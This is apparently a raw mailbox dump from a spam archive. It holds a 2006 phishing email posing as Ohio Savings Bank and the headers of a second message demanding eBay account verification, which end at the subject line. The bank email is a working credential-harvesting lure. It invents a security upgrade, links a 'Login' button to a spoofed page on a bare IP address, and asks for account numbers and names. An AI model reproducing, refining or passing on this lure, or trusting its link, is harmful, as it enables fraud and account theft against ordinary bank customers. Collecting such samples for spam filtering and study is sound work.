From: "Ohio Savings Bank" <account@ohiosavings.com>
Reply-To: "Ohio Savings Bank" <account@ohiosavings.com>
To: openbsd-mobile@example.com
Cc: openbsd-tech@example.com, owner-madinfo-outgoing@example.com,
	nobody@example.com
Subject: Confirm your Ohio Savings account status
Date: Mon, 27 Feb 2006 16:15:18 +0100
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--25396277856295423"
X-Priority: 3
X-MSMail-Priority: Normal
Status: O
X-Status: 
X-Keywords:                  
X-UID: 476

----25396277856295423
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<FONT face=3DVerdana size=3D2>&nbsp;<img alt=3D"OhioSavings.com" src=3D"ht=
tp://www.ohiosavings.com/images/ohiologo.gif" border=3D"0" hspace=3D"10" v=
space=3D"14"></a></td>
	<td width=3D"100%"><br><br>&nbsp;&nbsp;&nbsp;Dear Ohio Savings Customer,<=
BR></div>&nbsp; 
<DIV>&nbsp;
<DIV>&nbsp;&nbsp; Due to recent fraudulent activities on some of Ohio Savi=
ngs online <br>&nbsp;&nbsp;&nbsp;accounts we are launching a new security =
system to make Ohio Savings<br>&nbsp;&nbsp;&nbsp;online accounts more secu=
re and safe. Before we <br>&nbsp;&nbsp;&nbsp;can activate it we will be ch=
ecking all Ohio Savings <br>&nbsp;&nbsp;&nbsp;online accounts to confirm t=
he authenticity of the holder.</DIV>
<DIV><FONT color=3D#003399></FONT>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; We will require a confirmation that your account has=
 not been <br>&nbsp;&nbsp;&nbsp;stolen or hacked. Your account has not bee=
n suspended or frozen.</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; To confirm your account status please <A href=3D"htt=
p://222.56.20.48/www.ohiosavings.com/index.html">Login</A><BR><BR>&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;-complete the required information to authenti=
cate and reset your account<BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-ma=
ke sure your account balance has not been changed<BR><BR>&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;-make sure your details have not been changed<BR><BR>&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-review recent transactions in your acco=
unt history for any unauthorized transfer</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp;&nbsp;If you find any type of suspicious activities p=
lease contact us immediately.<br>&nbsp;&nbsp; Please include in your messa=
ge your account number, your account name<br>&nbsp;&nbsp; and the unauthor=
ized transfer date & time.<BR><BR><BR></DIV>

<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Please do not reply to this message. For any inquiries, =
contact Customer Service.</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Ohio Savings Copyright =A9 2006</DIV></FONT>


----25396277856295423--

From root@pichinchacompite.gov.ec  Mon Feb 27 12:46:18 2006
Return-Path: <root@pichinchacompite.gov.ec>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id D66B5536E9C
	for <nobody@login.example.com>; Mon, 27 Feb 2006 12:46:17 -0500 (EST)
Received: from pichinchacompite.gov.ec (unknown [200.93.216.72])
	by mail2.example.com (Postfix) with ESMTP id CAF936FA25F
	for <nobody@example.com>; Mon, 27 Feb 2006 12:46:16 -0500 (EST)
Received: from pichinchacompite.gov.ec (localhost.localdomain [127.0.0.1])
	by pichinchacompite.gov.ec (8.13.1/8.13.1) with ESMTP id k1RHqrNp000584
	for <nobody@example.com>; Mon, 27 Feb 2006 12:52:53 -0500
Received: (from root@localhost)
	by pichinchacompite.gov.ec (8.13.1/8.13.1/Submit) id k1RHqqga000583;
	Mon, 27 Feb 2006 12:52:52 -0500
Date: Mon, 27 Feb 2006 12:52:52 -0500
Message-Id: <200602271752.k1RHqqga000583@pichinchacompite.gov.ec>
To: nobody@example.com
Subject: You are required to verify your eBay account
